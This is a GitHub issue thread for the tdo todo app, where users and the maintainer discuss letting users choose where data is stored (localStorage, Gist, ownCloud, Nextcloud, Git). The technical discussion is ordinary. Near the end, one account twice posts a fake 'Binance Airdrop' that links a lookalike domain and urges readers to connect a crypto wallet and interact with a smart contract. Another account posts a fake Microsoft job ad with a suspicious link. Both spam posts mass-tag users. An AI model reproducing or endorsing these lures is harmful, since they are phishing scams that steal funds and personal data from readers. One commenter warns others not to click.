### ISSUE TITLE
[enhancement] Set data storage location

### ISSUE THREAD

**Issue by argorain** [mstijak/tdo#13]
Hi.
I love tdo and it would be great if I can set location where are data stored. Gist storing is cool, but I use owncloud and it would be great to sync my notes via that like file.
Thanks a lot,
Vojtěch Vladyka

**Comment by mstijak** [comment]
I agree, that would be great. Dropbox and Google Drive are also very interesting options. 

It seems that Google supports implicit [auth flow](https://developers.google.com/identity/protocols/OAuth2UserAgent)
which could be used for this, although I'm not sure if it would work with our hash based routing.

Unfortunately, GitHub doesn't support this auth flow and it would require some kind of server-side middleware.

This is a big task so let's see if there are more people who would like the same feature.

**Comment by argorain** [comment]
And where are data stored now when I haven't Gist connected? 
How about just give option to set location of that file?

**Comment by mstijak** [comment]
By default, the data is stored in browser's localStorage.

**Comment by argorain** [comment]
I see... I am thinking if is there possibility to store data in file somewhere else, but I don't think so...

**Comment by nnako** [comment]
Hi,

I would be very much interested in integrating / handling lists stored locally (at least as an alternative to Gist storage). I would offer my support for implementing / testing this kind of feature (if support is needed / welcome).

At first, one question about the application structure. The browser address link always says something like this:

`https:// <server_name> / <path_to_indexfile> / #<identifier>`

**(1)** where is the `<identifier>` locally pointing to?
**(2)** how is that (temporary local) file structured?

In a first step, an additional tool could grab local portions from the browser's storage and synchronize it with a remot (e.g. GIT) repository on user demand. Likewise updates could be fetched from the same remote repo. Authentification could be organized in the standard GIT way?

**Comment by mstijak** [comment]
The `identifier` is just an id pointing to the active board. By putting it in the url, boards become linkable. 

Regarding storing lists locally, I'm not sure if that is the right path for tdo. I'm more interested in cloud features offered by Firebase, such as cloud login, real-time database and hosting. It would be great if someone is willing to help me integrate that.

If you really need a local tdo server, feel free to fork it and adapt it to your needs. That should be rather simple to implement.

**Comment by nnako** [comment]
**Do you have an "outline" of the path you'd like to go with tdo? Would you like to share it?**

I will try to sketch an outline about what I would have in mind regarding a further development of tdo (in one of my next posts). Maybe (hopefully) a combination would be a possible solution? 1+1=3 ;-)

Some small requirements (all points to make the utilisation more "crisp" for real projects):

USER INTERFACE
- operation on mobile devices (currently, on a tablet, todo items can not be re-opened)
- ...

DATA MODEL
- integration of multiple "responsibles", i.e. one person per task responsible for its completion
- integration of optional "deadlines" to specify the expected / required completion date
- integration of "scores" to provide a transparent completion status (and its project-specific meaning)
- ...

FUNCTIONALITY
- auto-eMail-reminders based on scores, deadlines and the current date
- ...

RELIABILITY / QUALITY
- interface for (self hosted) version control of list (using GIT)
- ...

Anyway, I could imagine supporting you with integrating cloud operation, real-time database and hosting. But I have to say that I am a "generalist". I know lots of programming languages as I (in the past) always adapted to existing project environments and picked any language necessary to contribute to the task at hand (ASSEMBLER, C/C++, JAVA, HTML, CSS, JavaScript, PHP, Python,...). But I am not a real "specialist" in any of them. Rather in the field of "development environments". The same with other technologies (microcontrollers, hardware design, content management, ...) . So, I might be rather a help regarding INFRASTRUCTURE, QUALITY and HELPFUL DOCUMENTATION. If that's ok for you, we can give it a try.

**Comment by mstijak** [comment]
@nnako Sorry for a late reply. I don't have an outline, so I wrote my ideas in a new issue #18. Please comment there what would you like to see in `tdo` and why.

**Comment by nnako** [comment]
@mstijak Just a short question about the storage of tdo's data (when not using a Ghist account). Where exactly do I find the user's tasks / lists / boards in the browser's local storage? And what data structure is used for this? I could figure it out, I guess, if I had at least a starting point within the source code. Any help?

**Comment by mstijak** [comment]
@nnako You can find it here: https://github.com/mstijak/tdo/blob/master/app/data/middleware/persist.js.  You can simply type localStorage.tdo in the console and you'll see all data (json encoded).

**Comment by jacekk** [comment]
@nnako any chrome-like browser
![image](https://cloud.githubusercontent.com/assets/1695878/23034590/9d3abf3c-f47c-11e6-9a31-5a69d2883064.png)

**Comment by Memphizzz** [comment]
@mstijak  I've just discovered tdo today. Wonderful work! I already dropped Wunderlist from all my devices and replaced it with tdo.

@nnako 
> So, I might be rather a help regarding INFRASTRUCTURE, QUALITY and HELPFUL DOCUMENTATION. If that's ok for you, we can give it a try.

I can provide a VM (any OS) on my server with good disk space, a 100MB/s internet connection (EU) and publish on whatever port we need. Got some domains for testing too.

Got a Nextcloud server running too, would love to get that as a storage location.
Alternatively as you mentioned Git, GitLab CE integration would be nice too.
Unfortunately I'm a C# developer, dunno how much I can help with that.

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @smttl, @guilhermebkel, @108abhishek, @gnrbrhm, @michaelvils, @Rzbck, @unitycoder

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @RickWong, @zofe, @muratyilmaz, @baontq, @suttonj, @maxoja, @divanoli

**Comment by larisoft** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.white-duke3, @gauravagrwal, @Skydenden, @rhijjawi, @rohanrhu, @Loopshape, @youfoundron, @helloworld9912, @xlBuckExpresslx, @karstenjakobsen, @crazyants, @ffrmns, @lorenzodisidoro, @bliotti, @h0tcatSub, @mitzampt, @fastnodclub, @PlayerOfGames797, @1levi1, @mayaleh

**Comment by rhijjawi** [comment]
Yeah how about you don't click that link.
